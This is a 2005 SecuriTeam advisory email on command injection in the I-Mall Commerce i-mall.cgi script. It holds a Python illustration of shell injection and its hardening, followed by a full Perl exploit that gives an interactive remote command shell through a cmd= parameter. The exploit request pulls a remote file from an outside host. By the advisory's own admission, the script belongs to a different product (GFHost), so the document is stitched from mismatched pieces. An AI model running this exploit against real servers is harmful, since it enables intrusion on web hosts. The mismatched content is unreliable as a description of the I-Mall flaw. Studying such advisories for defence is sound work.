[EXPL] I-Mall Commerce i-mall.cgi Arbitrary Command Execution (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/04/05

    To: list@securiteam.com
    Date: 4 May 2005 19:08:42 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      I-Mall Commerce i-mall.cgi Arbitrary Command Execution (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    I-Mall Commerce is "a CGI based online shopping suite in Korean language".
    A remote command execution vulnerability has been discovered in the I-Mall
    CGI Application by ZetaLabs, Zone-H Laboratories. The exploit code below
    can be used to test your system for the mentioned vulnerability.
    The issue is caused by insufficient filtering of externally supplied data
    passed to the i-mall.cgi script: a remote user can supply an arbitrary
    shell command in a request parameter, and the script passes it to the
    shell unchanged. An attacker may exploit this to execute commands in the
    security context of the web server hosting the affected script.
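    The pattern the summary describes, a query-string value concatenated into a
    shell command line so that shell syntax in the value becomes a second
    command, next to the hardened form, as an added example in Python. This is
    not I-Mall's code or the advisory's: the script name shop.cgi, the "file"
    parameter and DATA_DIR are assumptions, and the request is a constructed
    one shaped the way the exploit below sends it (whitespace encoded as "+").

```python
"""Shell command injection through a CGI query parameter.

Added example, not code from the I-Mall Commerce or GFHost advisories.
The script name (shop.cgi), the 'file' parameter and DATA_DIR are
assumptions chosen to illustrate the pattern the advisory describes:
externally supplied data concatenated into a shell command line.
"""
import re
import shlex
import subprocess
from urllib.parse import parse_qs, urlsplit

DATA_DIR = "/var/www/data"  # assumption

# Constructed request target: a normal filename with "; id" appended, encoded
# the way the advisory's script sends it (whitespace as '+', ';' as %3B).
SAMPLE_REQUEST = "/cgi-bin/shop.cgi?page=1&file=catalog.dat%3B+id"


def cgi_param(request_target, name):
    """Decode one query-string parameter as a CGI library would:
    '+' becomes a space and %XX escapes become the literal character."""
    query = urlsplit(request_target).query
    values = parse_qs(query, keep_blank_values=True).get(name, [])
    return values[0] if values else ""


def vulnerable_command(filename):
    """The anti-pattern: build a command line from user data for /bin/sh.
    Everything the shell treats as syntax (; | & ` $() newline) is honoured,
    so the value can terminate the intended command and start another."""
    return "cat %s/%s" % (DATA_DIR, filename)


def shell_tokens(command_line):
    """Tokenise as a POSIX shell would, keeping ; | & ( ) < > as their own
    tokens so an injected second command shows up in the token list."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    return list(lexer)


def injected_commands(command_line):
    """Return the tokens after the first command separator, i.e. what an
    attacker smuggled in; an empty list means a single plain command."""
    tokens = shell_tokens(command_line)
    for i, tok in enumerate(tokens):
        if tok and tok[0] in ";|&":
            return tokens[i + 1:]
    return []


SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")


def safe_command(filename):
    """Hardened handler: allow-list the value, then return an argv list.
    Passing a list to subprocess.run() means no shell parses the arguments,
    so the filename is only ever a filename.  Raises ValueError otherwise."""
    if not SAFE_NAME.match(filename) or ".." in filename:
        raise ValueError("rejected filename: %r" % filename)
    return ["cat", "%s/%s" % (DATA_DIR, filename)]


if __name__ == "__main__":
    filename = cgi_param(SAMPLE_REQUEST, "file")
    print("decoded parameter :", repr(filename))
    cmd = vulnerable_command(filename)
    print("vulnerable command:", cmd)
    print("shell tokens      :", shell_tokens(cmd))
    print("smuggled command  :", injected_commands(cmd))
    try:
        # Rejected before any process is spawned.
        subprocess.run(safe_command(filename), check=False)
    except ValueError as exc:
        print("hardened handler  :", exc)
    print("hardened argv     :", safe_command("catalog.dat"))
```

    The allow-list is the real fix; the argv form is the belt to go with it.
    Escaping metacharacters while still handing the string to a shell is the
    usual half-measure, and it breaks as soon as a second interpreter (a
    nested sh -c, backticks inside the called program) sees the value again.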

    DETAILS

    Exploit:
    (Note: the script below, as published, is the GFHost/PHP GMail exploit:
    its built-in request $U[1] targets /dl.php and appends the command to the
    cmd= parameter, not to i-mall.cgi. To test an I-Mall installation the
    request path up to the command parameter has to be entered by hand with
    the URL command; this advisory does not give the i-mall.cgi request.)
    ##############################################
    # GFHost explo
    # Spawn bash style Shell with webserver uid
    # Greetz SPAX, foxtwo, Zone-H
    # This Script is currently under development
    ##############################################

    use strict;
    use warnings;
    use IO::Socket;

    my $host;
    my $port;
    my $command = "";
    my $url;
    my @results;
    my $probe;
    my @U;
    # $U[0] is reserved for a URL typed in by the user (see &other); $U[1] is
    # the published request, the command is appended after "cmd=".
    $U[1] = "/dl.php?a=0.1&OUR_FILE=ff24404eeac528b".
            "&f=http://utenti.lycos.it/z00/xpl.gif&cmd=";

    &intro;
    &scan;
    &choose;
    &command;
    &quit;

    sub intro {
        &help;
        &host;
        &server;
        sleep 1;
    }

    sub host {
        print "\nHost or IP : ";
        $host = <STDIN>;
        chomp $host;
        if ($host eq "") { $host = "127.0.0.1" }
        print "\nPort (enter to accept 80): ";
        $port = <STDIN>;
        chomp $port;
        if ($port eq "" || $port =~ /\D/) { $port = "80" }
    }

    # Fingerprint the web server from the headers of a HEAD / response.
    sub server {
        my $webserver = "something";
        &clear;
        $probe = "string";
        &request;
        for my $X (0 .. 10) {
            my $output = $results[$X];
            next unless defined $output;
            if ($output =~ /apache/i) { $webserver = "apache" }
        }
        if ($webserver ne "apache") {
            print "\nServer does not look like Apache; continue? (Y/n): ";
            my $choice = <STDIN>;
            $choice = "y" unless defined $choice;
            chomp $choice;
            if ($choice =~ /^n/i) { &quit }
        } else {
            print "\n\nOK";
        }
    }

    # Send a harmless probe command through every known URL and look for its
    # output in the response (the probe is "dir", so "Directory" is expected).
    sub scan {
        my $status = "not_vulnerable";
        &clear;
        $command = "dir";
        for (my $loop = 1; $loop < @U; $loop++) {
            my $flag = "0";
            $url = $U[$loop];
            $probe = "scan";
            &request;
            foreach my $output (@results) {
                if ($output =~ /Directory/) {
                    $flag = "1";
                    $status = "vulnerable";
                }
            }
            if ($flag eq "0") {
                print "\n[$loop] $url ... not vulnerable";
            } else {
                print "\n[$loop] $url ... VULNERABLE";
            }
        }
        if ($status eq "not_vulnerable") {
            print "\n\nNo URL answered the probe; use URL to enter one by hand.\n";
        }
    }

    # Pick the request URL to use: RETURN keeps 1, 0 lets you type one in.
    sub choose {
        print "\nURL number (1-" . $#U . ", RETURN for 1, 0 to enter your own): ";
        my $choice = <STDIN>;
        &quit unless defined $choice;
        chomp $choice;
        if ($choice eq "") { $choice = "1" }
        if ($choice =~ /\D/ || $choice > $#U) { return &choose }
        if ($choice == 0) { &other }
        $url = $U[$choice];
    }

    sub other {
        print "Request path up to the command parameter (e.g. /dl.php?...&cmd=): ";
        my $other = <STDIN>;
        &quit unless defined $other;
        chomp $other;
        $U[0] = $other;
    }

    # Interactive loop: every line that is not one of the local keywords is
    # sent as the value of the command parameter.
    sub command {
        while ($command !~ /^quit$/i) {
            print "[$host]\$ ";
            $command = <STDIN>;
            &quit unless defined $command;   # EOF on stdin
            chomp $command;
            if ($command =~ /^quit$/i) { &quit }
            if ($command =~ /^url$/i)  { &choose; next }
            if ($command =~ /^scan$/i) { &scan;   next }
            if ($command =~ /^help$/i) { &help;   next }
            next if $command eq "";
            $command =~ s/\s/+/g;   # crude URL-encoding: whitespace only
            $probe = "command";
            &request;
        }
        &quit;
    }

    # Open a TCP connection, send one HTTP request and collect the whole
    # response into @results.
    sub request {
        my $connection = IO::Socket::INET->new(
            Proto    => "tcp",
            PeerAddr => $host,
            PeerPort => $port,
        ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
        $connection->autoflush(1);
        if ($probe =~ /^(command|scan)$/) {
            print $connection "GET $url$command HTTP/1.1\r\nHost: $host\r\nConnection: close\r\n\r\n";
        } elsif ($probe eq "string") {
            print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\nConnection: close\r\n\r\n";
        }
        # Read to EOF; Connection: close makes the server end the response
        # instead of keeping the connection open for another request.
        @results = <$connection>;
        close $connection;
        if ($probe eq "command" || $probe eq "string") { &output }
    }

    sub output {
        if ($probe eq "string") {
            # Only the first lines (the response headers) are of interest.
            for my $X (0 .. 10) {
                print $results[$X] if defined $results[$X];
            }
        } else {
            print $_ foreach @results;
        }
    }

    sub quit {
        print "\n\n\n ORP";
        CORE::exit;
    }

    sub help {
        &clear;
        print "\n
            GFHost PHP GMail
            Command Execution Vulnerability by SPABAM 2004";
        print "\n http://www.zone-h.org/advisories/read/id=4904
        ";
        print "\n GFHost.pl Exploit v1.1";
        print "\n \n note.. Script under DEVEL";
        print "\n";
        print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
        print "\n Command: SCAN URL HELP QUIT";
        print "\n" x 11;
    }

    # "Clear" the terminal the way the original did, by scrolling it.
    sub clear { print "\n" x 24 }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:jerome@athias.fr> Jerome
    ATHIAS.
    The original article can be found at:
    <http://www.zone-h.org/advisories/read/id=4904>

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

